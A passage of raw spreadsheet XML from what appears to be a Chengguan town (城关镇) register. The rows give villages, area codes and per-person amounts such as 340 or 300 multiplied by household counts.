        <f>C719</f>
        <v>城关镇工信局</v>
      </c>
      <c r="D720" s="14" t="s">
        <v>1937</v>
      </c>
      <c r="E720" s="14" t="s">
        <v>1938</v>
      </c>
      <c r="F720" s="14" t="str">
        <f>F719</f>
        <v>4113210106</v>
      </c>
      <c r="G720" s="14"/>
      <c r="H720" s="14"/>
      <c r="I720" s="14"/>
      <c r="J720" s="14"/>
      <c r="K720" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="721" ht="23" customHeight="1" spans="1:11">
      <c r="A721" s="13" t="s">
        <v>1939</v>
      </c>
      <c r="B721" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C721" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D721" s="14" t="s">
        <v>1940</v>
      </c>
      <c r="E721" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F721" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G721" s="14">
        <v>1</v>
      </c>
      <c r="H721" s="14">
        <v>340</v>
      </c>
      <c r="I721" s="14">
        <f>H721*G721</f>
        <v>340</v>
      </c>
      <c r="J721" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K721" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="722" ht="23" customHeight="1" spans="1:11">
      <c r="A722" s="13" t="s">
        <v>1941</v>
      </c>
      <c r="B722" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C722" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D722" s="14" t="s">
        <v>1942</v>
      </c>
      <c r="E722" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F722" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G722" s="14">
        <v>1</v>
      </c>
      <c r="H722" s="14">
        <v>340</v>
      </c>
      <c r="I722" s="14">
        <f>H722*G722</f>
        <v>340</v>
      </c>
      <c r="J722" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K722" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="723" ht="23" customHeight="1" spans="1:11">
      <c r="A723" s="13" t="s">
        <v>1943</v>
      </c>
      <c r="B723" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C723" s="14" t="s">
        <v>1944</v>
      </c>
      <c r="D723" s="14" t="s">
        <v>1945</v>
      </c>
      <c r="E723" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F723" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G723" s="14">
        <v>1</v>
      </c>
      <c r="H723" s="14">
        <v>340</v>
      </c>
      <c r="I723" s="14">
        <f>H723*G723</f>
        <v>340</v>
      </c>
      <c r="J723" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K723" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="724" ht="23" customHeight="1" spans="1:11">
      <c r="A724" s="13" t="s">
        <v>1946</v>
      </c>
      <c r="B724" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C724" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D724" s="14" t="s">
        <v>1947</v>
      </c>
      <c r="E724" s="14" t="s">
        <v>312</v>
      </c>
      <c r="F724" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G724" s="14">
        <v>1</v>
      </c>
      <c r="H724" s="14">
        <v>340</v>
      </c>
      <c r="I724" s="14">
        <f>H724*G724</f>
        <v>340</v>
      </c>
      <c r="J724" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K724" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="725" ht="23" customHeight="1" spans="1:11">
      <c r="A725" s="13" t="s">
        <v>1948</v>
      </c>
      <c r="B725" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C725" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D725" s="14" t="s">
        <v>1949</v>
      </c>
      <c r="E725" s="14" t="s">
        <v>1950</v>
      </c>
      <c r="F725" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G725" s="14">
        <v>2</v>
      </c>
      <c r="H725" s="14">
        <v>300</v>
      </c>
      <c r="I725" s="14">
        <f>H725*G725</f>
        <v>600</v>
      </c>
      <c r="J725" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K725" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="726" ht="23" customHeight="1" spans="1:11">
      <c r="A726" s="13" t="s">
        <v>1951</v>
      </c>
      <c r="B726" s="14" t="str">
        <f>B725</f>
        <v>城关镇</v>
      </c>
      <c r="C726" s="14" t="str">
        <f>C725</f>
        <v>城关中华</v>
      </c>
      <c r="D726" s="13" t="s">
        <v>1952</v>
      </c>
      <c r="E726" s="13" t="s">
        <v>1427</v>
      </c>
      <c r="F726" s="14" t="str">
        <f>F725</f>
        <v>4113210108</v>
      </c>
      <c r="G726" s="14"/>
      <c r="H726" s="14"/>
      <c r="I726" s="14"/>
      <c r="J726" s="14"/>
      <c r="K726" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="727" ht="23" customHeight="1" spans="1:11">
      <c r="A727" s="13" t="s">
        <v>1953</v>
      </c>
      <c r="B727" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C727" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D727" s="14" t="s">
        <v>1954</v>
      </c>
      <c r="E727" s="14" t="s">
        <v>438</v>
      </c>
      <c r="F727" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G727" s="14">
        <v>1</v>
      </c>
      <c r="H727" s="14">
        <v>340</v>
      </c>
      <c r="I727" s="14">
        <f>H727*G727</f>
        <v>340</v>
      </c>
      <c r="J727" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K727" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="728" ht="23" customHeight="1" spans="1:11">
      <c r="A728" s="13" t="s">
        <v>1955</v>
      </c>
      <c r="B728" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C728" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D728" s="14" t="s">
        <v>1956</v>
      </c>
      <c r="E728" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F728" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G728" s="14">
        <v>2</v>
      </c>
      <c r="H728" s="14">
        <v>300</v>
      </c>
      <c r="I728" s="14">
        <f>H728*G728</f>
        <v>600</v>
      </c>
      <c r="J728" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K728" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="729" ht="23" customHeight="1" spans="1:11">
      <c r="A729" s="13" t="s">
        <v>1957</v>
      </c>
      <c r="B729" s="14" t="str">
        <f>B728</f>
        <v>城关镇</v>
      </c>
      <c r="C729" s="14" t="str">
        <f>C728</f>
        <v>城关中华</v>
      </c>
      <c r="D729" s="23" t="s">
        <v>1958</v>
      </c>
      <c r="E729" s="19" t="s">
        <v>548</v>
      </c>
      <c r="F729" s="14" t="str">
        <f>F728</f>
        <v>4113210108</v>
      </c>
      <c r="G729" s="14"/>
      <c r="H729" s="14"/>
      <c r="I729" s="14"/>
      <c r="J729" s="14"/>
      <c r="K729" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="730" ht="23" customHeight="1" spans="1:11">
      <c r="A730" s="13" t="s">
        <v>1959</v>
      </c>
      <c r="B730" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C730" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D730" s="14" t="s">
        <v>1960</v>
      </c>
      <c r="E730" s="14" t="s">
        <v>820</v>
      </c>
      <c r="F730" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G730" s="14">
        <v>1</v>
      </c>
      <c r="H730" s="14">
        <v>340</v>
      </c>
      <c r="I730" s="14">
        <f>H730*G730</f>
        <v>340</v>
      </c>
      <c r="J730" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K730" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="731" ht="23" customHeight="1" spans="1:11">
      <c r="A731" s="13" t="s">
        <v>1961</v>
      </c>
      <c r="B731" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C731" s="14" t="s">
        <v>1962</v>
      </c>
      <c r="D731" s="14" t="s">
        <v>1963</v>
      </c>
      <c r="E731" s="14" t="s">
        <v>1964</v>
      </c>
      <c r="F731" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G731" s="14">
        <v>1</v>
      </c>
      <c r="H731" s="14">
        <v>420</v>
      </c>
      <c r="I731" s="14">
        <f>H731*G731</f>
        <v>420</v>
      </c>
      <c r="J731" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K731" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="732" ht="23" customHeight="1" spans="1:11">
      <c r="A732" s="13" t="s">
        <v>1965</v>
      </c>
      <c r="B732" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C732" s="14" t="s">
        <v>1966</v>
      </c>
      <c r="D732" s="14" t="s">
        <v>1967</v>
      </c>
      <c r="E732" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F732" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G732" s="14">
        <v>1</v>
      </c>
      <c r="H732" s="14">
        <v>340</v>
      </c>
      <c r="I732" s="14">
        <f>H732*G732</f>
        <v>340</v>
      </c>
      <c r="J732" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K732" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="733" ht="23" customHeight="1" spans="1:11">
      <c r="A733" s="13" t="s">
        <v>1968</v>
      </c>
      <c r="B733" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C733" s="14" t="s">
        <v>1966</v>
      </c>
      <c r="D733" s="14" t="s">
        <v>1969</v>
      </c>
      <c r="E733" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F733" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G733" s="14">
        <v>2</v>
      </c>
      <c r="H733" s="14">
        <v>300</v>
      </c>
      <c r="I733" s="14">
        <f>H733*G733</f>
        <v>600</v>
      </c>
      <c r="J733" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K733" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="734" ht="23" customHeight="1" spans="1:11">
      <c r="A734" s="13" t="s">
        <v>1970</v>
      </c>
      <c r="B734" s="14" t="str">
        <f>B733</f>
        <v>城关镇</v>
      </c>
      <c r="C734" s="14" t="str">
        <f>C733</f>
        <v>城关镇东北</v>
      </c>
      <c r="D734" s="23" t="s">
        <v>1971</v>
      </c>
      <c r="E734" s="19" t="s">
        <v>331</v>
      </c>
      <c r="F734" s="14" t="str">
        <f>F733</f>
        <v>4113210103</v>
      </c>
      <c r="G734" s="14"/>
      <c r="H734" s="14"/>
      <c r="I734" s="14"/>
      <c r="J734" s="14"/>
      <c r="K734" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="735" ht="23" customHeight="1" spans="1:11">
      <c r="A735" s="13" t="s">
        <v>1972</v>
      </c>
      <c r="B735" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C735" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D735" s="14" t="s">
        <v>1973</v>
      </c>
      <c r="E735" s="14" t="s">
        <v>1974</v>
      </c>
      <c r="F735" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G735" s="14">
        <v>1</v>
      </c>
      <c r="H735" s="14">
        <v>340</v>
      </c>
      <c r="I735" s="14">
        <f>H735*G735</f>
        <v>340</v>
      </c>
      <c r="J735" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K735" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="736" ht="23" customHeight="1" spans="1:11">
      <c r="A736" s="13" t="s">
        <v>1975</v>
      </c>
      <c r="B736" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C736" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D736" s="14" t="s">
        <v>1976</v>
      </c>
      <c r="E736" s="14" t="s">
        <v>1977</v>
      </c>
      <c r="F736" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G736" s="14">
        <v>1</v>
      </c>
      <c r="H736" s="14">
        <v>340</v>
      </c>
      <c r="I736" s="14">
        <f>H736*G736</f>
        <v>340</v>
      </c>
      <c r="J736" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K736" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="737" ht="23" customHeight="1" spans="1:11">
      <c r="A737" s="13" t="s">
        <v>1978</v>
      </c>
      <c r="B737" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C737" s="14" t="s">
        <v>1237</v>
      </c>
      <c r="D737" s="14" t="s">
        <v>1979</v>
      </c>
      <c r="E737" s="14" t="s">
        <v>1980</v>
      </c>
      <c r="F737" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G737" s="14">
        <v>1</v>
      </c>
      <c r="H737" s="14">
        <v>340</v>
      </c>
      <c r="I737" s="14">
        <f>H737*G737</f>
        <v>340</v>
      </c>
      <c r="J737" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K737" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="738" ht="23" customHeight="1" spans="1:11">
      <c r="A738" s="13" t="s">
        <v>1981</v>
      </c>
      <c r="B738" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C738" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D738" s="14" t="s">
        <v>1982</v>
      </c>
      <c r="E738" s="14" t="s">
        <v>1983</v>
      </c>
      <c r="F738" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G738" s="14">
        <v>1</v>
      </c>
      <c r="H738" s="14">
        <v>340</v>
      </c>
      <c r="I738" s="14">
        <f>H738*G738</f>
        <v>340</v>
      </c>
      <c r="J738" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K738" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="739" ht="23" customHeight="1" spans="1:11">
      <c r="A739" s="13" t="s">
        <v>1984</v>
      </c>
      <c r="B739" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C739" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D739" s="14" t="s">
        <v>1985</v>
      </c>
      <c r="E739" s="14" t="s">
        <v>1986</v>
      </c>
      <c r="F739" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G739" s="14">
        <v>2</v>
      </c>
      <c r="H739" s="14">
        <v>300</v>
      </c>
      <c r="I739" s="14">
        <f>H739*G739</f>
        <v>600</v>
      </c>
      <c r="J739" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K739" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="740" ht="23" customHeight="1" spans="1:11">
      <c r="A740" s="13" t="s">
        <v>1987</v>
      </c>
      <c r="B740" s="14" t="str">
        <f>B739</f>
        <v>城关镇</v>
      </c>
      <c r="C740" s="14" t="str">
        <f>C739</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D740" s="15" t="s">
        <v>1988</v>
      </c>
      <c r="E740" s="15" t="s">
        <v>1989</v>
      </c>
      <c r="F740" s="14" t="str">
        <f>F739</f>
        <v>4113210108</v>
      </c>
      <c r="G740" s="14"/>
      <c r="H740" s="14"/>
      <c r="I740" s="14"/>
      <c r="J740" s="14"/>
      <c r="K740" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="741" ht="23" customHeight="1" spans="1:11">
      <c r="A741" s="13" t="s">
        <v>1990</v>
      </c>
      <c r="B741" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C741" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D741" s="14" t="s">
        <v>1991</v>
      </c>
      <c r="E741" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F741" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G741" s="14">
        <v>1</v>
      </c>
      <c r="H741" s="14">
        <v>340</v>
      </c>
      <c r="I741" s="14">
        <f>H741*G741</f>
        <v>340</v>
      </c>
      <c r="J741" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K741" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="742" ht="23" customHeight="1" spans="1:11">
      <c r="A742" s="13" t="s">
        <v>1992</v>
      </c>
      <c r="B742" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C742" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D742" s="14" t="s">
        <v>1993</v>
      </c>
      <c r="E742" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F742" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G742" s="14">
        <v>1</v>
      </c>
      <c r="H742" s="14">
        <v>340</v>
      </c>
      <c r="I742" s="14">
        <f>H742*G742</f>
        <v>340</v>
      </c>
      <c r="J742" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K742" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="743" ht="23" customHeight="1" spans="1:11">
      <c r="A743" s="13" t="s">
        <v>1994</v>
      </c>
      <c r="B743" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C743" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D743" s="14" t="s">
        <v>1995</v>
      </c>
      <c r="E743" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F743" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G743" s="14">
        <v>2</v>
      </c>
      <c r="H743" s="14">
        <v>300</v>
      </c>
      <c r="I743" s="14">
        <f>H743*G743</f>
        <v>600</v>
      </c>
      <c r="J743" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K743" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="744" ht="23" customHeight="1" spans="1:11">
      <c r="A744" s="13" t="s">
        <v>1996</v>
      </c>
      <c r="B744" s="14" t="str">
        <f>B743</f>
        <v>城关镇</v>
      </c>
      <c r="C744" s="14" t="str">
        <f>C743</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D744" s="23" t="s">
        <v>1997</v>
      </c>
      <c r="E744" s="19" t="s">
        <v>320</v>
      </c>
      <c r="F744" s="14" t="str">
        <f>F743</f>
        <v>4113210108</v>
      </c>
      <c r="G744" s="14"/>
      <c r="H744" s="14"/>
      <c r="I744" s="14"/>
      <c r="J744" s="14"/>
      <c r="K744" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="745" ht="23" customHeight="1" spans="1:11">
      <c r="A745" s="13" t="s">
        <v>1998</v>
      </c>
      <c r="B745" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C745" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D745" s="14" t="s">
        <v>1999</v>
      </c>
      <c r="E745" s="14" t="s">
        <v>1274</v>
      </c>
      <c r="F745" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G745" s="14">
        <v>2</v>
      </c>
      <c r="H745" s="14">
        <v>320</v>
      </c>
      <c r="I745" s="14">
        <f>H745*G745</f>
        <v>640</v>
      </c>
      <c r="J745" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K745" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="746" ht="23" customHeight="1" spans="1:11">
      <c r="A746" s="13" t="s">
        <v>2000</v>
      </c>
      <c r="B746" s="14" t="str">
        <f>B745</f>
        <v>城关镇</v>
      </c>
      <c r="C746" s="14" t="str">
        <f>C745</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D746" s="23" t="s">
        <v>2001</v>
      </c>
      <c r="E746" s="13" t="s">
        <v>2002</v>
      </c>
      <c r="F746" s="14" t="str">
        <f>F745</f>
        <v>4113210108</v>
      </c>
      <c r="G746" s="14"/>
      <c r="H746" s="14"/>
      <c r="I746" s="14"/>
      <c r="J746" s="14"/>
      <c r="K746" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="747" ht="23" customHeight="1" spans="1:11">
      <c r="A747" s="13" t="s">
        <v>2003</v>
      </c>
      <c r="B747" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C747" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D747" s="14" t="s">
        <v>2004</v>
      </c>
      <c r="E747" s="14" t="s">
        <v>2005</v>
      </c>
      <c r="F747" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G747" s="14">
        <v>1</v>
      </c>
      <c r="H747" s="14">
        <v>340</v>
      </c>
      <c r="I747" s="14">
        <f t="shared" ref="I747:I752" si="32">H747*G747</f>
        <v>340</v>
      </c>
      <c r="J747" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K747" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="748" ht="23" customHeight="1" spans="1:11">
      <c r="A748" s="13" t="s">
        <v>2006</v>
      </c>
      <c r="B748" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C748" s="14" t="s">
        <v>2007</v>
      </c>
      <c r="D748" s="14" t="s">
        <v>2008</v>
      </c>
      <c r="E748" s="14" t="s">
        <v>1242</v>
      </c>
      <c r="F748" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G748" s="14">
        <v>1</v>
      </c>
      <c r="H748" s="14">
        <v>340</v>
      </c>
      <c r="I748" s="14">
        <f t="shared" si="32"/>
        <v>340</v>
      </c>
      <c r="J748" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K748" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="749" ht="23" customHeight="1" spans="1:11">
      <c r="A749" s="13" t="s">
        <v>2010</v>
      </c>
      <c r="B749" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C749" s="14" t="s">
        <v>219</v>
      </c>
      <c r="D749" s="14" t="s">
        <v>2011</v>
      </c>
      <c r="E749" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F749" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G749" s="14">
        <v>1</v>
      </c>
      <c r="H749" s="14">
        <v>340</v>
      </c>
      <c r="I749" s="14">
        <f t="shared" si="32"/>
        <v>340</v>
      </c>
      <c r="J749" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K749" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="750" ht="23" customHeight="1" spans="1:11">
      <c r="A750" s="13" t="s">
        <v>2012</v>
      </c>
      <c r="B750" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C750" s="14" t="s">
        <v>2013</v>
      </c>
      <c r="D750" s="14" t="s">
        <v>2014</v>
      </c>
      <c r="E750" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F750" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G750" s="14">
        <v>1</v>
      </c>
      <c r="H750" s="14">
        <v>340</v>
      </c>
      <c r="I750" s="14">
        <f t="shared" si="32"/>
        <v>340</v>
      </c>
      <c r="J750" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K750" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="751" ht="23" customHeight="1" spans="1:11">
      <c r="A751" s="13" t="s">
        <v>2015</v>
      </c>
      <c r="B751" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C751" s="14" t="s">
        <v>2013</v>
      </c>
      <c r="D751" s="14" t="s">
        <v>2016</v>
      </c>
      <c r="E751" s="14" t="s">
        <v>360</v>
      </c>
      <c r="F751" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G751" s="14">
        <v>1</v>
      </c>
      <c r="H751" s="14">
        <v>340</v>
      </c>
      <c r="I751" s="14">
        <f t="shared" si="32"/>
        <v>340</v>
      </c>
      <c r="J751" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K751" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="752" ht="23" customHeight="1" spans="1:11">
      <c r="A752" s="13" t="s">
        <v>2017</v>
      </c>
      <c r="B752" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C752" s="14" t="s">
        <v>2018</v>
      </c>
      <c r="D752" s="14" t="s">
        <v>2019</v>
      </c>
      <c r="E752" s="14" t="s">
        <v>2020</v>
      </c>
      <c r="F752" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G752" s="14">
        <v>2</v>
      </c>
      <c r="H752" s="14">
        <v>300</v>
      </c>
      <c r="I752" s="14">
        <f t="shared" si="32"/>
        <v>600</v>
      </c>
      <c r="J752" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K752" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="753" ht="23" customHeight="1" spans="1:11">
      <c r="A753" s="13" t="s">
        <v>2021</v>
      </c>
      <c r="B753" s="14" t="str">
        <f>B752</f>
        <v>城关镇</v>
      </c>
      <c r="C753" s="14" t="str">
        <f>C752</f>
        <v>中华社区九组</v>
      </c>
      <c r="D753" s="18" t="s">
        <v>2022</v>
      </c>
      <c r="E753" s="18" t="s">
        <v>2023</v>
      </c>
      <c r="F753" s="14" t="str">
        <f>F752</f>
        <v>4113210108</v>
      </c>
      <c r="G753" s="14"/>
      <c r="H753" s="14"/>
      <c r="I753" s="14"/>
      <c r="J753" s="14"/>
      <c r="K753" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="754" ht="23" customHeight="1" spans="1:11">
      <c r="A754" s="13" t="s">
        <v>2024</v>
      </c>
      <c r="B754" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C754" s="14" t="s">
        <v>2025</v>
      </c>
      <c r="D754" s="14" t="s">
        <v>2026</v>
      </c>
      <c r="E754" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F754" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G754" s="14">
        <v>1</v>
      </c>
      <c r="H754" s="14">
        <v>340</v>
      </c>
      <c r="I754" s="14">
        <f t="shared" ref="I754:I766" si="33">H754*G754</f>
        <v>340</v>
      </c>
      <c r="J754" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K754" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="755" ht="23" customHeight="1" spans="1:11">
      <c r="A755" s="13" t="s">
        <v>2027</v>
      </c>
      <c r="B755" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C755" s="14" t="s">
        <v>2028</v>
      </c>
      <c r="D755" s="14" t="s">
        <v>2029</v>
      </c>
      <c r="E755" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F755" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G755" s="14">
        <v>1</v>
      </c>
      <c r="H755" s="14">
        <v>340</v>
      </c>
      <c r="I755" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J755" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K755" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="756" ht="23" customHeight="1" spans="1:11">
      <c r="A756" s="13" t="s">
        <v>2030</v>
      </c>
      <c r="B756" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C756" s="14" t="s">
        <v>2028</v>
      </c>
      <c r="D756" s="14" t="s">
        <v>2031</v>
      </c>
      <c r="E756" s="14" t="s">
        <v>2032</v>
      </c>
      <c r="F756" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G756" s="14">
        <v>1</v>
      </c>
      <c r="H756" s="14">
        <v>340</v>
      </c>
      <c r="I756" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J756" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K756" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="757" ht="23" customHeight="1" spans="1:11">
      <c r="A757" s="13" t="s">
        <v>2033</v>
      </c>
      <c r="B757" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C757" s="14" t="s">
        <v>2025</v>
      </c>
      <c r="D757" s="14" t="s">
        <v>2034</v>
      </c>
      <c r="E757" s="14" t="s">
        <v>616</v>
      </c>
      <c r="F757" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G757" s="14">
        <v>1</v>
      </c>
      <c r="H757" s="14">
        <v>340</v>
      </c>
      <c r="I757" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J757" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K757" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="758" ht="23" customHeight="1" spans="1:11">
      <c r="A758" s="13" t="s">
        <v>2035</v>
      </c>
      <c r="B758" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C758" s="14" t="s">
        <v>2028</v>
      </c>
      <c r="D758" s="14" t="s">
        <v>2036</v>
      </c>
      <c r="E758" s="14" t="s">
        <v>2037</v>
      </c>
      <c r="F758" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G758" s="14">
        <v>1</v>
      </c>
      <c r="H758" s="14">
        <v>340</v>
      </c>
      <c r="I758" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J758" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K758" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="759" ht="23" customHeight="1" spans="1:11">
      <c r="A759" s="13" t="s">
        <v>2038</v>
      </c>
      <c r="B759" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C759" s="14" t="s">
        <v>2039</v>
      </c>
      <c r="D759" s="14" t="s">
        <v>2040</v>
      </c>
      <c r="E759" s="14" t="s">
        <v>2041</v>
      </c>
      <c r="F759" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G759" s="14">
        <v>1</v>
      </c>
      <c r="H759" s="14">
        <v>340</v>
      </c>
      <c r="I759" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J759" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K759" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="760" ht="23" customHeight="1" spans="1:11">
      <c r="A760" s="13" t="s">
        <v>2042</v>
      </c>
      <c r="B760" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C760" s="14" t="s">
        <v>2043</v>
      </c>
      <c r="D760" s="14" t="s">
        <v>2044</v>
      </c>
